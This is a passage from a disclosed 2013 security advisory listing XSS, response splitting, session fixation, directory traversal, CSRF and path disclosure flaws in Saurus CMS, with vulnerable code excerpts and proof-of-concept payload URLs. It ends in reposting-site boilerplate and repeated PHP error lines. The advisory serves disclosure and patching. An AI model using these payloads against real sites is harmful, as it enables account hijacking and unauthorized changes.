&did=&?= $site-&fdat['did']?&' .. &TD&&?if($site-&fdat['profile_id']){?&&a href="javascript：void(openpopup
('edit_profile.php?op=delete&pid=&?= $site-&fdat['profile_id']?& .. &TD&&?if($site-&fdat['profile_id']){?&&a href="javascript：void(openpopup
('edit_profile.php?op=duplicate&pid=&?= $site-&fdat['profile_id']?&
&did=&?=$site-&fdat['did']?&' .. &TD&&a href="&?= $site-&self ?&?profile_id=&?= $site-&fdat['profile_id']?&&op=sync" ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/profiles.php?profile_id="&&script&alert(123);&/script& http://localhost/saurus471/admin/profiles.php?source_table="&&script&alert(123);&/script& http://localhost/saurus471/admin/profiles.php?profile_id=z&did="&&script&alert(123);&/script&
javascript. alert boxes popping up, confirming Reflected XSS vulnerability.
########### 28. Reflected XSS in "admin/sys_alias.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id" Preconditions:
1. logged in as Saurus CMS admin
http://localhost/saurus471/admin/sys_alias.php?flt_keel="&&script&alert(123);&/script& http://localhost/saurus471/admin/sys_alias.php?keel_id="&&script&alert(123);&/script&
javascript. alert boxes popping up, confirming Reflected XSS vulnerability.
########### 29. Reflected XSS in "admin/sys_sonad_loetelu.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "flt_keel" Preconditions:
1. logged in as Saurus CMS admin
http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=&/script&&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 30. Reflected XSS in "admin/user_management.php" ###########
1. improper encoding or escaping of output Attack vector:
1. all user-supplied parameters (excluding "selected_devices") Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/user_management.php" line 138: ------------------------[ source code start ]---------------------------------- foreach($site-&fdat as $fdat_field=&$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '&input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'"&';
------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/user_management.php?foobar="&&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 31. Reflected XSS in "admin/permissions.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/permissions.php" line 229: ------------------------[ source code start ]---------------------------------- &input type=hidden id="selectform_selected_group" name="selected_group"
value="&?=$site-&fdat['selected_group']?&"& &input type=hidden id="selectform_user_id" name="user_id"
value="&?=$site-&fdat['user_id']?&"& &input type=hidden id="selectform_group_id" name="group_id"
value="&?=$site-&fdat['group_id']?&"& ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/permissions.php?selected_group="&&script&alert(123);&/script& http://localhost/saurus471/admin/permissions.php?user_id="&&script&alert(123);&/script& http://localhost/saurus471/admin/permissions.php?group_id="&&script&alert(123);&/script& http://localhost/saurus471/admin/permissions.php?role_id="&&script&alert(123);&/script&
javascript. alert boxes popping up, confirming Reflected XSS vulnerability.
########### 32. Reflected XSS in "admin/file_source.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied GET parameter "selected_group" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/file_source.php" line 47: ------------------------[ source code start ]---------------------------------- $callback = (string)$_GET['callback']; .. &?=$?&("&?=str_replace(array('"', "\n", "\r"),
array('\"', '\n', '\r'), $fcontent);?&"); ------------------------[ source code end ]------------------------------------
Test (parameter "file" must be valid):
http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);//
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 33. Reflected XSS in "admin/change_config.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "flt_keel" and "group" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/change_config.php" line 1220: ------------------------[ source code start ]---------------------------------- &input type=hidden name=flt_keel value="&?=$site-&fdat['flt_keel']?&"& .. &input type="hidden" name="group" value="&?=$site-&fdat['group']?&"& ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="&&script&alert(123);&/script& http://localhost/saurus471/admin/change_config.php?group="&&script&alert(123);&/script&
javascript. alert boxes popping up, confirming Reflected XSS vulnerability.
########### 34. Reflected XSS in "admin/forms.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "form_id" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/forms.php" line 222: ------------------------[ source code start ]---------------------------------- if($site-&fdat['op'] == 'delete' && $site-&fdat['form_id']) { ..
&input type=hidden name=form_id value="&?=$site-&fdat['form_id']?&"& ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/forms.php?op=delete&form_id="&&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 35. Reflected XSS in "admin/lang_file.php" ###########
1. improper encoding or escaping of output Attack vector:
1. user-supplied parameter "flt_keel" and "keel_id" Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/lang_file.php" line 204: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site-&fdat[flt_keel]) ? $site-&fdat[flt_keel] : $site-&fdat[keel_id]; .. &input type=hidden name=keel_id value="&?=$keel_id ?&"& ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="&&script&alert(123);&/script& http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="&&script&alert(123);&/script&
javascript. alert boxes popping up, confirming Reflected XSS vulnerability.
########### 36. Reflected XSS in "admin/select_group.php" ###########
1. improper encoding or escaping of output Attack vector:
1. all user-supplied parameters (excluding "selected_devices") Preconditions:
1. logged in as Saurus CMS admin
Php script. "admin/select_group.php" line 442: ------------------------[ source code start ]---------------------------------- foreach($site-&fdat as $fdat_field=&$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '&input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'"& ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/select_group.php?foobar="&&script&alert(123);&/script&
javascript. alert box pops up, confirming Reflected XSS vulnerability.
########### 37. HTTP Response Splitting
and insecure redirection in "redirect.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied GET parameter "url" Preconditions:
1. php version & 4.4.2 or & 5.1.2
Php script. "redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) {
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!\r|\n.*!s", "", $url);
header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/redirect.php?url=war%0d%0axe
Result (using php 5.3.24):
Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\redirect.php on line 106
http://localhost/saurus471/redirect.php?url=http://php.net/
successful redirection
########### 38. HTTP Response Splitting
and insecure redirection in "editor/redirect.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied GET parameter "url" Preconditions:
1. php version & 4.4.2 or & 5.1.2
Php script. "editor/redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) {
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!\r|\n.*!s", "", $url);
header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe
Result (using php 5.3.24):
Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\editor\redirect.php on line 106
http://localhost/saurus471/editor/redirect.php?url=http://php.net/
successful redirection
########### 39. HTTP Response Splitting in "idcard/index.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied GET and POST parameters "targeturl" Preconditions:
1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file)
2. php version & 4.4.2 or & 5.1.2
Php script. "idcard/index.php" line 9: ------------------------[ source code start ]---------------------------------- if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; } elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; }
header('Location: ../idcard.php'.$targeturl); ------------------------[ source code end ]------------------------------------
########### 40. HTTP Response Splitting in "admin/lang_file.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id" Preconditions:
1. php version & 4.4.2 or & 5.1.2
2. logged in as Saurus CMS admin
Php script. "admin/lang_file.php" line 44: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site-&fdat[flt_keel]) ? $site-&fdat[flt_keel] : $site-&fdat[keel_id]; .. if ($site-&fdat['op'] == 'export' && $site-&fdat['op2'] == 'salvesta'){
header("Content-Disposition: filename=\"language".$keel_id.".csv\""); ------------------------[ source code end ]------------------------------------
http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a
Result (using php 5.3.24, from errorlog):
Header may not contain more than a single header, new line detected
########### 41. HTTP Response Splitting in "admin/publish.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "url" Preconditions:
1. php version & 4.4.2 or & 5.1.2
2. logged in as Saurus CMS user with publish privileges
Php script. "admin/publish.php" line 118: ------------------------[ source code start ]---------------------------------- header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site-&CONF[hostname].$site-&fdat[url]); ------------------------[ source code end ]------------------------------------
########### 42. HTTP Response Splitting in "add_comment.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url" Preconditions:
1. php version & 4.4.2 or & 5.1.2
Php script. "add_comment.php" line 135: ------------------------[ source code start ]---------------------------------- header('Location: '.urldecode(preg_replace("!\r|\n.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2'); .. header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://':
'https://').$site-&CONF['hostname'].$site-&CONF['wwwroot']. ($site-&in_editor?'/editor':'').'/?'.(($site-&fdat['tpl'] ||
$site-&fdat['c_tpl'])&&!$site-&fdat['inserted_id']&& !$site-&fdat['jump_to_parent']?'tpl='.$site-&fdat['tpl']. '&c_tpl='.$site-&fdat['c_tpl'].'&':'').'id='.$site-&fdat['id'].'&lisa_alert=2'); .. if ($site-&fdat['output_device'] == 'pda') {
if (strlen($site-&fdat['text']) & 2 || strlen($site-&fdat['nimi']) & 2) {
myRedirect($site-&fdat['redirect_url']); .. header("Location: ".urldecode($site-&fdat['redirect_url'])); .. function myRedirect($url) { ..
header("Location: " . urldecode($url)); } ------------------------[ source code end ]------------------------------------
########### 43. Information leakage in "admin/check_requirements.php" ###########
Reason: insufficient access control
http://localhost/saurus471/admin/check_requirements.php
Simple GET request as shown above reveals some information about web server: MySQL version, Webserver version, PHP version, multiple php setting values, multiple directory permissions. Anyone can access this diagnostic script, no access control exist.
########### 44. Session Fixation vulnerability in "admin/ajax_response.php" ###########
Attack vector:
1. user-supplied POST parameter "PHPSESSID" Preconditions: none
Some years ago PHP session fixation attacks were easy to exploit: just add PHPSESSID= to URI and done. Modern PHP versions are more secure by default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0, "session.use_trans_sid" defaults to "0". So even if PHP-based web application does have session fixation vulnerability, many real world installations are hard to exploit. Now let's look at Saurus CMS source code.
Php script. "admin/ajax_response.php" line 27: ------------------------[ source code start ]---------------------------------- if(isset($_POST['PHPSESSID'])) {
session_id($_POST['PHPSESSID']);
session_start(); } ------------------------[ source code end ]------------------------------------
We can see, that user-submitted POST parameter PHPSESSID is used as argument for PHP function "session_id()", which is followed by "session_start()". It means, that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session fixation attacks are possible.
&html&&body&&center& &form. action="http://localhost/saurus471/admin/ajax_response.php" method="post"& &input type="hidden" name="PHPSESSID" value="7788"& &input type="submit" value="Test"& &/form& &/center&&/body&&/html&
Press "Test button" and then observe server response:
HTTP/1.1 200 OK Date: Wed, 05 Jun :19 GMT Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t Expires: Thu, 19 Nov :00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=7788; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/javascript. Now log in as Saurus CMS admin and look for session cookies:
GET /saurus471/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/ Firefox/21.0 Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8 Accept-Language: en-US,q=0.5 Accept-Encoding: gzip, deflate Cookie: logged=1; PHPSESSID=7788 Connection: keep-alive
We can see, that after authentication session ID does not change, which indicates Session Fixation vulnerability existence.
Solution: implement session ID renewal after successful user authentication.
########### 45. Directory Traversal vulnerability in "admin/ajax_response.php" ###########
1. insufficient sanitization of user-supplied data Attack vector:
1. user-supplied parameter "name" Preconditions:
1. logged in as valid Saurus CMS user Result: logged in Saurus CMS user can test existence of arbitrary files on remote server filesystem.
Php script. "admin/ajax_response.php" line 52: ------------------------[ source code start ]---------------------------------- // check if a file exists if($site-&user-&user_id && $_REQUEST['op'] == 'check_file' && $site-&fdat['name']) {
include_once($class_path.'adminpage.inc.php');
$pathinfo = str_replace(array('../', './', '..\\', '.\\'), '', $site-&fdat['name']);
$pathinfo = explode('/', $pathinfo);
$filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true);
unset($pathinfo[count($pathinfo) - 1]);
$dirname = implode('/', $pathinfo);
if(file_exists($site-&absolute_path.$dirname.'/'.$filename))
echo '{"file_exists": 1}';
echo '{"file_exists": 0}';
} ------------------------[ source code end ]------------------------------------
As seen above, php function "str_replace()" is used for filtering out possible directory traversal substrings. Such filtering is not secure enough and can be bypassed with specially crafted parameter "name".
http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt
Result: {"file_exists": 0}
http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt
Result: {"file_exists": 1}
########### 46. Cross-Site Request Forgery in "admin/trash.php" ###########
1. missing CSRF token checks Result:
1. Unauthorized deletion of objects from Recycle Bin
Php script. "admin/trash.php" line 85: ------------------------[ source code start ]---------------------------------- if($site-&fdat['delete_all'] && count($site-&fdat['objects'])) {
//empty trash
for($i = count($site-&fdat['objects']) - 1; $i &= 0; $i--)
foreach($site-&fdat['objects'][$i] as $object_id =& $values) if($object_id)
$delete_objs = new Alamlist(array(
'parent' =& $object_id,
'klass' =& $classes,
while($object = $delete_objs-&next())
$object-&del(); ------------------------[ source code end ]------------------------------------
As seen above, there is no protection against CSRF.
http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1
Result (from sitelog): "Recycle Bin emptied"
Solution: use "verify_form_token()" function in critical places
########### 47. Cross-Site Request Forgery in "admin/change_config.php" ###########
1. missing CSRF token checks Result:
1. Unauthorized modification of site configuration
Php script. "admin/change_config.php" line 85: ------------------------[ source code start ]---------------------------------- if ($site-&fdat[salvesta]==1) {
foreach ($site-&fdat as $key=&$value) {
if ( substr ($key, 0, 4) == "cff_" ) {
$sql = $site-&db-&prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4));
$sth = new SQL($sql); ------------------------[ source code end ]------------------------------------
We can see, that there is no protection against CSRF.
http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0 http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1
Saurus CMS configuration setting "save_error_log" has been changed
Solution: use "verify_form_token()" function in critical places
########### 48. Cross-Site Request Forgery in "admin/forms.php" ###########
1. missing CSRF token checks Result:
1. Unauthorized deletion of forms
Php script. "admin/forms.php" line 137: ------------------------[ source code start ]---------------------------------- if($site-&fdat['op2'] == 'deleteconfirmed' && $site-&fdat['form_id']) {
# delete form. $sql = $site-&db-&prepare("DELETE FROM forms WHERE form_id=?",$site-&fdat['form_id']);
$sth = new SQL($sql); ------------------------[ source code end ]------------------------------------
We can see, that there is no protection against CSRF.
http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5
Result (from sitelog): "Form. 'testform' deleted"
Solution: use "verify_form_token()" function in critical places
########### 49. Full Path Disclosure in multiple scripts ###########
Preconditions:
1. PHP setting "display_errors = On"
http://localhost/saurus471/admin/edit_object.php
Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\edit_object.php on line 1299
http://localhost/saurus471/admin/edit_pilt.php
Fatal error: Class 'Timer' not found in C:\apache_www\saurus471\admin\edit_pilt.php on line 21
http://localhost/saurus471/admin/templates.php
Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\templates.php on line 57
Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
06.06.2013 -& First email to vendor 06.06.2013 -& First response email from vendor 06.06.2013 -& Sending detailed information to vendor 07.06.2013 -& Vendor started fixing found problems 21.06.2013 -& Found problems are fixed 14.07.2013 -& Current advisory released
Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Janek Vind "waraxe"
Waraxe forum:
http://www.waraxe.us/forums.html Personal homepage: / Random project: / ---------------------------------- [ EOF ] ------------------------------------
声明：该文章系网友上传分享，此内容仅代表网友个人经验或观点，不代表本网站立场和观点；若未进行原创声明，则表明该文章系转载自互联网；若该文章内容涉嫌侵权，请及时向
上一篇：下一篇：
相关经验教程
的原创经验被浏览，获得￥0.001 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.001 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.001 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.001 收益
的原创经验被浏览，获得￥0.005 收益
的原创经验被浏览，获得￥0.002 收益
的原创经验被浏览，获得￥0.005 收益

Fatal error: Class 'fckeditor 2.6.3 漏洞' not found -------on line 238

我要回帖

更多关于 fckeditor 的文章

随机推荐

Fatal error: Class &#039;fckeditor 2.6.3 漏洞&#039; not found -------on line 238

我要回帖

更多关于 fckeditor 的文章

随机推荐

Fatal error: Class 'fckeditor 2.6.3 漏洞' not found -------on line 238